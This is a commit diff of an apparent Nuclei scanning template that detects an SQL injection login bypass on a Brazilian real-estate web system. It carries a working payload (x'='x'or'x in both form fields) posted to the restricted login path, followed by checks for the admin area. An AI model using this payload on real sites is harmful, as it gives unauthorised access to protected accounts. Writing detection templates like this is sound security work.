fix matcher
parent
519d77e5d4
commit
2a7ac6eb8a
|
@ -16,18 +16,23 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /restrito/login HTTP/1.1
|
||||
POST /restrito/login/sub/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
|
||||
|
||||
- |
|
||||
GET /restrito/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Sistema Web para Imobiliárias e Corretores"
|
||||
- "Área Restrita"
|
||||
- "Banner"
|
||||
- "Construtoras"
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue